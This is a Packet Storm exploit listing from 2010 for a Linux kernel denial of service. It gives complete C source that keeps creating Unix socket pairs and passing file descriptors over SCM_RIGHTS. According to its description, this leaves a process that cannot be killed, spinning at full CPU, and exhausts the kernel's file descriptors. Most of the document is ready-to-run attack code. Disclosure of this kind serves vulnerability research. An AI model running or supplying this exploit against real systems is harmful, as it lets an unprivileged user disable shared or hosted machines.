Linux Kernel Unix Sockets Denial Of Service

2010-11-27T00:00:00
ID PACKETSTORM:96141
Type packetstorm
Reporter Key Night
Modified 2010-11-27T00:00:00

Description

                                        
                                            `Simple kernel attack using socketpair. easy, 100% reproductiblle,  
works under guest. no way to protect :(  
  
See source attached.  
  
Process become in state 'Running' but not killalble via kill -KILL.  
  
eat 100% CPU, eat all available internal file descriptors in kernel :(  
  
--   
Segmentation fault  
  
#include <sys/socket.h>  
#include <sys/un.h>  
  
static int send_fd (int unix_fd, int fd)  
{  
struct msghdr msgh;  
struct cmsghdr *cmsg;  
char buf[CMSG_SPACE (sizeof (fd))];  
memset (&msgh, 0, sizeof (msgh));  
  
memset (buf, 0, sizeof (buf));  
  
msgh.msg_control = buf;  
msgh.msg_controllen = sizeof (buf);  
  
cmsg = CMSG_FIRSTHDR (&msgh);  
cmsg->cmsg_len = CMSG_LEN (sizeof (fd));  
cmsg->cmsg_level = SOL_SOCKET;  
  
cmsg->cmsg_type = SCM_RIGHTS;  
  
msgh.msg_controllen = cmsg->cmsg_len;  
  
memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));  
return sendmsg (unix_fd, &msgh, 0);  
}  
  
int main ()  
{  
int fd[2], ff[2];  
  
int target;  
if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1)  
return 1;  
for (;;)  
{  
if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)  
return 2;  
send_fd (ff[0], fd[0]);  
send_fd (ff[0], fd[1]);  
  
close (fd[1]);  
close (fd[0]);  
fd[0] = ff[0];  
fd[1] = ff[1];  
}  
}  
  
  
`